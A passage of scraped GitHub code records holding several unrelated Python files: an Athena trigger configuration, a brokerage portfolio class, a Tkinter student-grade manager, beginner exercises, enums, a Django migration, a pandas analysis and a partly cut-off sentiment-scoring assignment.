TypeNames = HLTResults) )\n\n from TrigEDMConfig.TriggerEDM import getTPList\n acc.addPublicTool( CompFactory.TrigSerTPTool(TPMap = getTPList((flags.Trigger.EDMVersion))) )\n \n acc.addPublicTool( CompFactory.TrigSerializeConvHelper(doTP = True) )\n\n acc.addPublicTool( CompFactory.HLT.HLTResultByteStreamTool(HLTResultRobIdMap = robIDMap))\n\n acc.addEventAlgo(extr)\n\n return acc\n\ndef Run1xAODConversionCfg(flags):\n \"\"\"Convert Run 1 EDM collections to xAOD classes\"\"\"\n acc = ComponentAccumulator()\n\n log.info(\"Will configure Run 1 trigger EDM to xAOD conversion\")\n from TrigEDMConfig.TriggerEDM import getTriggerEDMList\n from TrigEDMConfig.TriggerEDM import getEFRun1BSList,getEFRun2EquivalentList,getL2Run1BSList,getL2Run2EquivalentList\n\n from TrkConfig.TrkParticleCreatorConfig import TrackParticleCreatorToolCfg\n partCreatorTool = acc.popToolsAndMerge(TrackParticleCreatorToolCfg(flags,\n PixelToTPIDTool=None\n )\n )\n acc.addPublicTool(partCreatorTool)\n\n from xAODTrackingCnv.xAODTrackingCnvConfig import TrackCollectionCnvToolCfg,RecTrackParticleContainerCnvToolCfg\n trackCollCnvTool = acc.popToolsAndMerge(TrackCollectionCnvToolCfg(flags,\n name=\"TrackCollectionCnvTool\",\n TrackParticleCreator= partCreatorTool\n )\n )\n\n recPartCnvTool = acc.popToolsAndMerge(RecTrackParticleContainerCnvToolCfg(flags,\n name=\"RecParticleCnv\",\n TrackParticleCreator=partCreatorTool\n )\n )\n \n bstoxaodTool = CompFactory.TrigBStoxAODTool(\"BStoxAOD\", \n ContainersToConvert = getL2Run1BSList() + getEFRun1BSList(), \n NewContainers = getL2Run2EquivalentList() + getEFRun2EquivalentList(),\n TrackCollectionCnvTool = trackCollCnvTool,\n TrackParticleContainerCnvTool = recPartCnvTool\n )\n acc.setPrivateTools(bstoxaodTool)\n\n # write the xAOD (Run-2) classes to the output\n acc.merge(addToESD(flags, edmDictToList(getTriggerEDMList(flags.Trigger.ESDEDMSet, runVersion=2))))\n acc.merge(addToAOD(flags, edmDictToList(getTriggerEDMList(flags.Trigger.AODEDMSet, runVersion=2))))\n\n return acc\n\ndef Run3TriggerBSUnpackingCfg(flags):\n 
\"\"\"Configures conversions BS -> HLTResultMT -> Collections \"\"\"\n acc = ComponentAccumulator()\n\n if flags.Trigger.DecodeHLT is False:\n log.debug(\"Run3TriggerBSUnpackingCfg: Nothing to do as Trigger.DecodeHLT is False\")\n return acc\n\n from AthenaCommon.CFElements import seqAND\n decoder = CompFactory.HLTResultMTByteStreamDecoderAlg()\n deserialiser = CompFactory.TriggerEDMDeserialiserAlg(\"TrigDeserialiser\")\n from TrigDecisionTool.TrigDecisionToolConfig import getRun3NavigationContainerFromInput\n deserialiser.ExtraOutputs += [('xAOD::TrigCompositeContainer' , 'StoreGateSvc+'+getRun3NavigationContainerFromInput(flags))]\n acc.addSequence(seqAND(\"HLTDecodingSeq\"))\n acc.addEventAlgo( decoder, \"HLTDecodingSeq\")\n acc.addEventAlgo( deserialiser, \"HLTDecodingSeq\")\n log.debug(\"Configured HLT result BS decoding sequence\")\n return acc\n\n\nif __name__ == '__main__':\n from AthenaConfiguration.MainServicesConfig import MainServicesCfg\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n\n flags = initConfigFlags()\n flags.fillFromArgs()\n\n from AthenaConfiguration.TestDefaults import defaultTestFiles\n flags.Input.Files = defaultTestFiles.RAW_RUN3 # need to update this depending on EDMversion\n flags.Exec.MaxEvents=5\n log.info('Checking setup for EDMVersion %d', flags.Trigger.EDMVersion)\n if flags.Trigger.EDMVersion==1:\n flags.Input.Files = defaultTestFiles.RAW_RUN1\n elif flags.Trigger.EDMVersion==2:\n flags.Input.Files = defaultTestFiles.RAW_RUN2\n elif flags.Trigger.EDMVersion==3:\n flags.Input.Files = defaultTestFiles.RAW_RUN3\n \n\n flags.lock()\n\n acc = MainServicesCfg(flags)\n acc.merge( TriggerRecoCfg(flags) )\n acc.printConfig(withDetails=True)\n with open(\"TriggerReco.pkl\", \"wb\") as file:\n acc.store(file)\n # TODO decide if we want to run actually\n # sc = acc.run()\n # if sc.isFailure():\n # import sys\n # sys.exit(-1)\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"Trigger/TriggerCommon/TriggerJobOpts/python/TriggerRecoConfig.py","file_name":"TriggerRecoConfig.py","file_ext":"py","file_size_in_byte":18649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21836512435","text":"import tinvest as tinvest\nimport control.account.variables as variables\n\naccount = tinvest.SyncClient(variables.token)\n\n\nclass Portfolio:\n \"\"\" клас Портфолио, пока по умолчанию используется обычный брокер счет (variables.broker_account_id)\n \"\"\"\n\n def __init__(self):\n self.broker_account_id = variables.broker_account_id\n self.portfolio = account.get_portfolio(self.broker_account_id)\n self.stocks = []\n self.bond = []\n self.etf = []\n self.currency = []\n self.get_all_position()\n\n def get_all_position(self):\n \"\"\" разбираем по коллекциям акции, облигации, фонды и тп\n \"\"\"\n for p in self.portfolio.payload.positions:\n if p.instrument_type.value == \"Stock\":\n self.stocks.append(p)\n if p.instrument_type.value == \"Bond\":\n self.bond.append(p)\n if p.instrument_type.value == \"Etf\":\n self.etf.append(p)\n if p.instrument_type.value == \"Currency\":\n self.currency.append(p)\n\n def get_exchange_rate_usd(self):\n return float(account.get_market_orderbook(\"BBG0013HGFT4\", 1).payload.close_price) # цена доллара из стакана, имхо\n\n\nportfolio = 
Portfolio()\n","repo_name":"PaskomS/tipaskom","sub_path":"control/account/cur_account.py","file_name":"cur_account.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5449586573","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\n#CREACIÓN DE LA VENTATA\napp= Tk()\napp.geometry (\"500x300\")\napp.title(\"Listado de Estudiantes\")\napp.resizable(0,0)\n\n#MENÚ DE INICIO\nencabezado=Label(app, text =\"Listado de Estudiantes\")\nencabezado.config(\n fg=\"white\",\n bg=\"black\",\n padx=100,\n pady=20,\n font=(\"Tahoma\",30) \n)\nencabezado.grid (row=0, column=0, columnspan=11, sticky=W)\n\n# ACCIÓN DEL RADIOBUTTON\ndef marcar():\n marcado.config(text=opcion)\n\n#AGREGAR ESTUDIANTE\ndef agregar():\n\tif(len(nomest)==5):\n\t\ttop = messagebox.showerror('Error', \"Se ha registrado el máximo número de estudiantes posible.\")\n\n\telse:\n\t\n\t\t\t#CREAR VENTANA NUEVA\n\t\t\ttop = Toplevel()\n\t\t\ttop.title(\"Añadir estudiantes\")\n\t\t\ttop.geometry(\"300x205\")\n\t\t\t#AGREGAR NOMBRE\n\t\t\tLabel(top,text=\"Introduzca el nombre:\").place(x=0,y=0)\n\t\t\tEntry(top,bd=5,bg='white',textvariable=agnom, fg='black').place(x=0,y=30)\n\t\t\t#AGREGAR APELLIDO\n\t\t\tLabel(top,text=\"Introduzca el apellido:\").place(x=0,y=60)\n\t\t\tEntry(top,bd=5,bg='white', textvariable=aglast, fg='black').place(x=0,y=80)\n\t\t\t#AGREGAR NOTA\n\t\t\tLabel(top,text=\"Introduzca la nota del estudiante:\").place(x=0,y=120)\n\t\t\tEntry(top,bd=5,bg='white', textvariable=agnota, fg='black').place(x=0,y=140)\n\t\t\t#BOTÓN AGREGAR\n\t\t\tButton(top,text= \"Agregar\",command=agregar2).place(x=0,y=180)\n\t\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=60,y=180)\n \ndef agregar2():\n\tif(len(nomest)==10):\n\t\ttop = messagebox.showerror('Error', \"Se ha registrado el máximo número de estudiantes posible.\")\n\telif((agnom.get()=='') and (aglast.get()=='') and ((agnota.get()<0) or (agnota.get()>100))):\n\t\ttop = messagebox.showerror('Error', \"Todos los datos ingresados son inválidos.\")\n\telif((agnom.get()=='') and (aglast.get()=='')):\n\t top = messagebox.showerror('Error', \"Por favor ingrese uno o más nombres y apellidos.\")\n\telif(agnom.get()==''):\n\t\ttop = messagebox.showerror('Error', \"Por favor ingrese uno o más nombres.\")\n\telif(aglast.get()==''):\n\t\ttop = messagebox.showerror('Error', \"Por favor ingrese uno o más apellidos.\")\n\telif((agnota.get()<0) or (agnota.get()>100)):\n\t\ttop = messagebox.showerror('Error', \"La nota ingresada no se encuentra en el intervalo permitido.\")\n\telse:\n\t\tnomest.append(agnom.get() + ' ' + aglast.get())\n\t\tnotaest.append(agnota.get())\n\t\t\"\"\"print(nomest)\n\t\tprint(agnom.get())\n\t\tprint(len(nomest))\n\t\tprint(notaest)\n\t\tprint(agnota.get())\n\t\tprint(len(notaest))\"\"\"\n\n#BUSCAR ESTUDIANTE\ndef buscar():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Buscar estudiante\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top,text=\"Introduzca el nombre completo del estudiante por buscar:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=busnom, fg='black').place(x=0,y=30)\n\t\tLabel(top, textvariable=busnota).place(x=0,y=60)\n\t\t\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Buscar\",command=buscar2).place(x=0,y=180)\n\t\tButton(top,text= 
\"Cerrar\",command=top.destroy).place(x=60,y=180)\n\ndef buscar2():\n\tcontrol = search(nomest, busnom.get())\n\tif(control == 1234):\n\t\tbusnota.set(\"El estudiante que busca no está registrado.\")\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\n\telse:\n\t\tbusnota.set(\"La nota del estudiante \" + nomest[control] + \" es \" + str(notaest[control]) + \".\")\n\ndef search(list, name):\n\tfor i in range(len(list)):\n\t\tif list[i] == name:\n\t\t\treturn i\n\treturn 1234\n\n#MODIFICAR NOTA\ndef modificar():\n\tif(len(nomest)==0):\n\t\tmessagebox.showerror(\"Error\", \"No se han ingresado estudiantes todavía\")\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Modificar Nota\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top, text=\"Introduzca el nombre completo del estudiante por cambiar de nota:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=modnom, fg='black').place(x=0,y=30)\n\t\tLabel(top, text=\"Introduzca la nueva nota:\").place(x=0,y=60)\n\t\tEntry(top, bd=5,bg='white', textvariable=modnota, fg='black').place(x=0,y=90)\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Modificar\",command=modificar2).place(x=0,y=140)\n\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=70,y=140)\n\ndef modificar2():\n\tcontrol = search(nomest, modnom.get())\n\tif(control == 1234):\n\t\tbusnota.set(\"El estudiante que busca no está registrado.\")\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\telif((modnota.get()<0)) or (modnota.get()>100):\n\t\tmessagebox.showerror(\"Error\", \"La nota que desea ingresar está fuera del intervalo deseado\")\n\telse:\n\t\tv = notaest[control]\n\t\tnotaest[control]=modnota.get()\n\t\tbusnota.set(\"La nota del estudiante \" + nomest[control] + \" es \" + str(notaest[control]) + \".\")\n\t\tmessagebox.showerror(\"Éxito\", \"La nota ha sido modificada exitosamente de \"+str(v)+\" a \"+str(notaest[control])+ \".\")\n\n#LISTADO POR NOMBRE\ndef Lnombre():\n top= Toplevel()\n top.title(\"Listado por Nombre de estudiantes\")\n top.geometry(\"900x200\")\n nombres = nomest\n Label(top,text=\"Listado de los estudiantes por nombre: \").place(x=0,y=0)\n if (len(nomest)==0):\n messagebox.showerror(\"Error\", \"No se han registrado estudiantes\")\n else:\n for i in range(len(nombres)):\n nombres.sort()\n Label(top,text=nombres).place(x=0,y=25)\n #BOTÓN ACEPTAR\n Button(top,text= \"Aceptar\",command=top.destroy).place(x=2,y=150)\n\n#BUSCAR ESTUDIANTE\ndef Lnotas():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Orden por notas\")\n\t\ttop.geometry(\"700x205\")\n\t\tLabel(top, text = \"Listado de estudiantes en orden ascendente de notas:\").grid(row=0, column=0, columnspan=10)\n\t\t \n\t\tnomcopy = nomest.copy()\n\t\tnotacopy = notaest.copy()\n\t\tfor i in range(len(notacopy)):\n\t\t\tfor m in range(len(notacopy)):\n\t\t\t\tp = notacopy[m]\n\t\t\t\tq = nomcopy[m]\n\t\t\t\tif(notacopy[m] > notacopy[i]):\n\t\t\t\t\tnotacopy[m] = notacopy[i]\n\t\t\t\t\tnotacopy[i] = p\n\t\t\t\t\tnomcopy[m] = nomcopy[i]\n\t\t\t\t\tnomcopy[i] = q\t\n\t\tprint(nomcopy)\n\t\tprint(notacopy)\t\n\n\t\tfor i in range(len(notacopy)):\t \n\t\t\tLabel(top, text = nomcopy[i]).grid(row=(i+2), column=0, sticky=W)\n\t\t\tLabel(top, text = str(notacopy[i])).grid(row=(i+2), column=1, sticky=W)\n\n\n#MEDIA DE NOTAS\ndef media():\n\tif (len(notaest)==0):\n\t\tmessagebox.showerror(\"Error\", \"No se han registrado 
estudiantes\")\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Media de las notas\")\n\t\ttop.geometry(\"400x100\")\n\t\tmedia1()\n\t\tLabel(top,text=\"El valor de la media total de los estudiantes en el sistema es de:\").place(x=0,y=0)\n\t\tLabel(top, text=mediatotal.get()).place(x=0,y=30)\n\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=0,y=60)\n\ndef media1():\n\tn=0\n\tfor i in range(len(notaest)):\n\t\t\tn=notaest[i]+n\n\tmedia= n/len(notaest)\n\tmediatotal.set(media)\n\n\n#ELIMINAR ESTUDIANTE\ndef eliminar():\n\tif(len(nomest)==0):\n\t\ttop = messagebox.showerror('Error', \"No se han ingresado estudiantes todavía.\")\n\n\telse:\n\t\ttop= Toplevel()\n\t\ttop.title(\"Eliminar estudiante\")\n\t\ttop.geometry(\"500x205\")\n\t\tLabel(top,text=\"Introduzca el nombre completo del estudiante para eliminarlo:\").place(x=0,y=0)\n\t\tEntry(top, bd=5,bg='white', textvariable=eliminarnom, fg='black').place(x=0,y=30)\n\n\t\t#BOTÓN BUSCAR\n\t\tButton(top,text= \"Eliminar\",command=eliminar2).place(x=0,y=180)\n\ndef eliminar2():\n\tcontrol = search(nomest, eliminarnom.get())\n\tif(control == 1234):\n\t\tmessagebox.showerror(\"Error\", \"El estudiante que busca no está registrado.\")\n\t\t\n\telse:\n\t\tp=nomest[control]\n\t\tt=notaest[control]\n\t\tnomest.pop(control)\n\t\tnotaest.pop(control)\n\t\tmessagebox.showinfo(\"Operación exitosa\", \"El estudiante \" + p + \" con nota de \" + str(t) + \" ha sido eliminado exitosamente.\")\n\n#FUNCIONES DE CADA RADIOBUTTON\ndef elegir():\n    if opcion.get()==1:\n        agregar()\n    elif opcion.get()==2:\n        buscar()\n    elif opcion.get()==3:\n        modificar()\n    elif opcion.get()==4:\n        Lnombre()\n    elif opcion.get()==5:\n        Lnotas()\n    elif opcion.get()==6:\n        media()\n    elif opcion.get()==7:\n        eliminar()\n    \n#VARIABLES Y LISTAS\nnomest = []\nnotaest = []\nopcion = IntVar()\n\n#VARIABLES PARA FUNCIÓN AGREGAR \nagnom = StringVar()\naglast = StringVar()\nagnota = DoubleVar()\n#VARIABLES PARA FUNCIÓN MEDIA\nmediatotal =DoubleVar()\nmediatotal.set(0)\n#VARIABLES PARA FUNCIÓN BUSCAR\nbusnom = StringVar()\nbusnota = StringVar()\nbusnota.set('')\n#VARIABLES PARA FUNCIÓN MODIFICAR\nmodnom= StringVar()\nmodnota=DoubleVar()\nopcion.set(0)\neliminarnom= StringVar()\n#CREAR LOS RADIOBUTTONS\nLabel(app, text=\"¿Qué desea realizar?\", anchor =W).grid (row=2, column=0, sticky=W)\n\nRadiobutton(app, text =\"Añadir estudiantes\", value=1,variable=opcion, command=marcar).grid(row=3, column=0, sticky=W)\nRadiobutton(app, text =\"Buscar estudiantes\", value=2, variable=opcion,command=marcar).grid(row=5, column=0, sticky=W)\nRadiobutton(app, text =\"Modificar nota\", value=3,variable=opcion, command=marcar).grid(row=6, column=0, sticky=W)\nRadiobutton(app, text =\"Listado de estudiantes ordenados por nombre\", value=4,variable=opcion, command=marcar).grid(row=7, column=0, sticky=W)\nRadiobutton(app, text =\"Listado de estudiantes ordenado por notas\", value=5,variable=opcion, command=marcar).grid(row=8, column=0, sticky=W)\nRadiobutton(app, text =\"Mostrar la media de la notas\", value=6,variable=opcion, command=marcar).grid(row=9, column=0, sticky=W)\nRadiobutton(app, text =\"Borrar un 
estudiante\", value=7,variable=opcion, command=marcar).grid(row=10, column=0, sticky=W)\n\nmarcado = Label(app)\nboton= Button(app,text= \"Aceptar\",command=elegir)\nboton.grid(row=12, column=0, sticky=E+W)\n\napp.mainloop()\n\n","repo_name":"jose137sp/sist-estudiantes-py","sub_path":"problema1.py","file_name":"problema1.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8862596703","text":"s1=input(\"Enter the number\")\r\nl1=[]\r\nl1=list(map(int,s1))\r\nn1=int(s1)\r\nsum=0\r\nfor i in range(len(l1)):\r\n sum=sum+l1[i]**len(s1)\r\nif(sum==n1):\r\n print(\"Armstrong\")\r\nelse:\r\n print(\"Not Armstrong\")\r\n#fibonacci\r\ndef fibonaccise(a,b,n):\r\n if n==0:\r\n return \r\n else:\r\n c=a+b\r\n print(c)\r\n a=b\r\n b=c\r\n fibonaccise(a,b,n-1)\r\nn=int(input(\"Enter the number:\" ))\r\na=0\r\nb=1\r\nc=0\r\nprint(a)\r\nprint(b)\r\nprint(\"recursion\")\r\nn=n-2\r\nfibonaccise(a,b,n)\r\nprint(\"Non recursion\")\r\nfor i in range(n):\r\n c=a+b\r\n print(c)\r\n a=b\r\n b=c\r\n#recursion\r\n#prime\r\n print(\"Hello World\")\r\nn1=int(input(\"Enter number\"))\r\nprime=True\r\nfor i in range(2,n1):\r\n if(n1%1==0):\r\n prime=False\r\nprint(prime)","repo_name":"Alekya-9118/Practiceproblems","sub_path":"armstring.py","file_name":"armstring.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659534273","text":"from enum import Enum\n\n\nclass NotesOrderByEnum(Enum):\n\t\"\"\"\n\tСортировка заметок пользователя по дате\n\t\"\"\"\n\tdate_asc = \"date\"\n\tdate_desc = \"-date\"\n\n\nclass NotesPeriodEnum(Enum):\n\t\"\"\"\n\tФильтрация по дате (например, upcoming - заметки/задачи после сегодняшнего дня).\n\t\"\"\"\n\tupcoming = \"upcoming\"\n\tpast = \"past\"\n\tall = \"all\"\n\n\nclass NotesCompletedEnum(Enum): # if notes type is \"task\"\n\t\"\"\"\n\tФильтрация по статусу исполнения.\n\tСработает только если выбран тип заметок \"task\" (\"задача\").\n\t\"\"\"\n\tcompleted = True # upcoming task may be completed before their date\n\tnon_completed = False\n\tall = None\n\n\nclass NoteTypeEnum(Enum):\n\t\"\"\"\n\tФильтрация по типу заметок.\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\tall = \"all\"\n\n\nclass NoteTypeEnumDB(Enum):\n\t\"\"\"\n\tЗаметка может быть стандартной заметкой, а может - задачей.\n\tЭтот Enum для модели SA.\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\n\nclass PollingTypeEnum(Enum):\n\t\"\"\"\n\tТипы рандомных опроса для пользователя.\n\n\tПримеры опросов:\n\t- Note: \"Вам помогают или помогли сегодня заметки?\" (если по текущему дню они были);\n\t- Task: \"Сегодня получилось выполнить все задачи?\" (если были);\n\t- Health: \"Ваше самочувствие сегодня удовлетворительное?\";\n\t- Next_Day_Expectations: \"Завтра будет хороший день?\";\n\t- Mood: \"Какое сегодня было настроение?\".\n\t\"\"\"\n\tnote = \"note\"\n\ttask = \"task\"\n\thealth = \"health\"\n\tnext_day_expectations = \"next_day_expectations\"\n\tmood = \"mood\"\n","repo_name":"Dahaka1/eztask","sub_path":"app/static/enums.py","file_name":"enums.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16382725669","text":"def main():\n x = check_fuel()\n print(x)\n\n\ndef check_fuel():\n while True:\n try:\n numerator, denominator = input(\"Enter a fraction: \").split(\"/\")\n pctg = 
round((int(numerator)/int(denominator)) * 100)\n        except ValueError:\n            print(\"Invalid value, Try Again.\")\n        except ZeroDivisionError:\n            print(\"Cant divide by zero, Try Again.\")\n        else:\n            if int(pctg) <= 1:\n                return \"E\"\n            elif 99 <= int(pctg) <= 100:\n                return \"F\"\n            elif int(pctg) > 100:\n                continue\n            else:\n                return f\"{int(pctg)}%\"\n\nmain()","repo_name":"OfirPicciotto/CS50P","sub_path":"pset3/fuel/fuel.py","file_name":"fuel.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10289961819","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('api', '0026_auto_20150609_2337'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='configuration',\n            name='spark',\n            field=models.ForeignKey(verbose_name=b'Spark', to='api.BrewPiSpark'),\n        ),\n    ]\n","repo_name":"thomast74/oinkbrew_webapp","sub_path":"api/migrations/0027_auto_20150609_2351.py","file_name":"0027_auto_20150609_2351.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72995956673","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 30 10:44:04 2016\n\n@author: Rohan\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nnf = pd.read_csv('/Users/Rohan/Desktop/Code/pchall.csv')\nnf.head()\nnf['Date'] = pd.to_datetime(nf[\"ReleaseDate\"])\nnf['DomesticTotalGross'] = nf['DomesticTotalGross'].astype(float)\nnf['Runtime'] = nf['Runtime'].astype(float)\n\nnf = nf.sort_values('Date')\nplt.plot_date(x=nf[\"Date\"], y=nf[\"DomesticTotalGross\"],fmt=\"r-\") \nplt.title(\"Timeseries\")\nplt.ylabel(\"Total\")\nplt.grid(True)\nplt.show()\n\n\nnf = nf.sort_values('Runtime')\nplt.plot(nf[\"Runtime\"],nf[\"DomesticTotalGross\"])\nplt.title(\"Runtime vs Gross\")\nplt.ylabel(\"Total\")\nplt.xlabel(\"Runtime\")\nplt.grid(True)\nplt.show()\n\n##Group your data by Rating and find the average runtime \n#and domestic total gross at each level of Rating.\n\n\nnf.groupby([\"Rating\"])[\"Runtime\", \"DomesticTotalGross\"].mean(). plot(subplots=True)\n\n\"\"\" \n    Runtime  DomesticTotalGross\nRating  \nG  107.000000  2.684928e+08\nPG  99.933333  1.311357e+08\nPG-13  117.510638  1.114498e+08\nR  110.729730  6.989243e+07\n\n\"\"\"\n\n#Make one figure with (N=the number of MPAA ratings there are) \n#subplots, and in each plot the release date vs the domestic total gross.\n\n\n\npd.pivot_table(nf.reset_index(),\n    index='Date', columns='Rating', values='DomesticTotalGross'\n    ).plot(subplots=True, linestyle = '', marker = 'o')\n\n\n\nnf.groupby([\"Director\"])[\"DomesticTotalGross\"].mean().sort_values()\n#Francis Lawrence\n\n#Bin your dataset into months and make a bar graph of the mean domestic \n#total gross by month. Error bars will represent the standard error of the mean.\n\n#Title of graph should include: Mean Domestic Total Gross by Month in 2013\n\n#Topic for consideration: what is the correct \n#formula for the standard error of the mean? 
\n#Examine the error bars and see if they are \"reasonable.\"\n\n\nn = nf.groupby(pd.Grouper(key='Date', freq='M'))[\"DomesticTotalGross\"].mean()\nm = nf.groupby(pd.Grouper(key='Date', freq='M'))[\"DomesticTotalGross\"].std()\nm\n\nno = pd.DataFrame({'D':n.index, 'gross':n.values})\nmo = pd.DataFrame({'D':m.index, 'err':m.values})\n\nno.head()\nl1 = [1,2,3,4,5,6,7,8,9,10,11,12]\nno[\"month\"] = l1\n\n\n\nplt.title('Mean Domestic Total Gross by Month in 2013')\n \nplt.show()\n\n#######\nfig, ax = plt.subplots(1,1, figsize=(5,10))\nax.set_title('Mean Domestic Total Gross by Month in 2013')\nsns.barplot(x=no['month'].sort_values(), y=no['gross'], errwidth = 20, errcolor = \"r\")\nplt.errorbar(no.month, no.gross, mo.err, linestyle='None', marker='^')\nax.set_xlabel('Month')\nax.set_ylabel('Total')\n\n\n\n\n","repo_name":"YaoNiMing/privateML","sub_path":"challenges/02-pandas/submissions/rohans90/pandaschall.py","file_name":"pandaschall.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24415073673","text":"# File: ahmad_p1.py \r\n# Author: Arius Ahmad \r\n# Date: 11/7/22 \r\n# Section: 1003 \r\n# E-mail: arius.ahmad@maine.edu \r\n# Collaboration: I worked with McKade Wing (mckade.wing@maine.edu) and Teddy Morin (theodore.morin@maine.edu)\r\n\r\ndef CalcSent(userWord): # returns average sentiment score of an input word in movieReviews.txt\r\n    movieFile = open(\"movieReviews.txt\")\r\n    count = 0\r\n    total = 0\r\n    average = 0.0\r\n    \r\n    # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine if the word is equal to the users word, it adds the sentiment score of that line to the total and adds one to a counter.\r\n    for line in movieFile:\r\n        subLine = line.split()\r\n        for word in subLine:\r\n            if word not in (\"0\", \"1\", \"2\", \"3\", \"4\"):\r\n                if word == userWord:\r\n                    total += int(subLine[0])\r\n                    count += 1\r\n    # calculate average score of the word using total and count\r\n    average = total/count\r\n    \r\n    movieFile.close()\r\n    \r\n    return userWord,count,average\r\n\r\ndef CalcAvg(): # returns average sentiment score of all words in an input file\r\n    userFileName = input(\"Enter the name of the file with the words: \")\r\n    userFile = open(userFileName)\r\n    avgScoreList = []\r\n    overTotal = 0.0\r\n    overCount = 0\r\n    \r\n    # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine, call the CalcSent() function and store the variables returned into temp variables\r\n    for line in userFile:\r\n        subLine = line.split()\r\n        for word in subLine:\r\n            if word not in (\"0\", \"1\", \"2\", \"3\", \"4\"):\r\n                tempWord,tempCount,tempAvg = CalcSent(word)\r\n                # append average score of a single word to the avgScoreList\r\n                avgScoreList.append(tempAvg)\r\n    # get total of every average score of every word and store it in overTotal (overall Total)\r\n    for i in avgScoreList:\r\n        overTotal += i\r\n    # get count of all the average scores in the list and store it in overCount (overall Count)\r\n    overCount = len(avgScoreList)\r\n\r\n    overAvg = overTotal / overCount\r\n    \r\n    userFile.close()\r\n\r\n    # return the average score of all words together (overTotal / overCount) and the file name\r\n    return overAvg, userFileName\r\n\r\ndef MostPosNeg(): # returns most positive and negative word in an input file and each of 
their scores \r\n    userFileName = input(\"Enter the name of the file with the words: \")\r\n    userFile = open(userFileName)\r\n    wordList = []\r\n    avgList = []\r\n\r\n    # This loop goes through every line in the file and splits it into a list of words, subLine, then for every word in subLine, call the CalcSent() function and store the variables returned into temp variables\r\n    for line in userFile:\r\n        subLine = line.split()\r\n        for word in subLine:\r\n            if word not in (\"0\", \"1\", \"2\", \"3\", \"4\"):\r\n                tempWord,tempCount,tempAvg = CalcSent(word)\r\n                # append the temp word into the wordList and the temp average into average list. The word and its corresponding score should line up between the list indexes\r\n                wordList.append(tempWord)\r\n                avgList.append(tempAvg)\r\n\r\n    maxNum = 0.0\r\n    minNum = 100.0\r\n    maxWord = \"\"\r\n    minWord = \"\"\r\n    # finds the highest average score and its corresponding word in avgList\r\n    for i in range(len(avgList)):\r\n        if avgList[i] >= maxNum:\r\n            maxNum = avgList[i]\r\n            maxWord = wordList[i]\r\n    # finds the lowest average score and its corresponding word in avgList \r\n    for j in range(len(avgList)):\r\n        if avgList[j] <= minNum:\r\n            minNum = avgList[j]\r\n            minWord = wordList[j]\r\n\r\n    userFile.close()\r\n\r\n    return userFileName,maxWord,maxNum,minWord,minNum\r\n\r\ndef main():\r\n    task = 0\r\n    while task != 4:\r\n        task = int(input(\"What would you like to do? \\n 1. Calculate the sentiment score of a single word \\n 2. Calculate the average score of words in a file \\n 3. Find the highest and lowest scoring words in a file. \\n 4. Exit the program \\n Enter a number 1-4: \"))\r\n        if task == 1:\r\n            userWord = input(\"Enter a word: \")\r\n            theWord,count,average = CalcSent(userWord)\r\n            print(\"\\\"\"+theWord+\"\\\" appears\",count, \"times\")\r\n            print(\"The average score for reviews containing \\\"\"+theWord+\"\\\" is\", average, \"\\n\")\r\n        elif task == 2:\r\n            avg, fileName = CalcAvg()\r\n            if avg < 1.75:\r\n                print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is an insult.\\n\")\r\n            elif avg > 2.25:\r\n                print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is a compliment.\\n\")\r\n            else:\r\n                print(\"The average score of the words in \"+ fileName + \" is\",avg ,\"This is neutral\\n\")\r\n        elif task == 3:\r\n            userFileName,maxWord,maxNum,minWord,minNum = 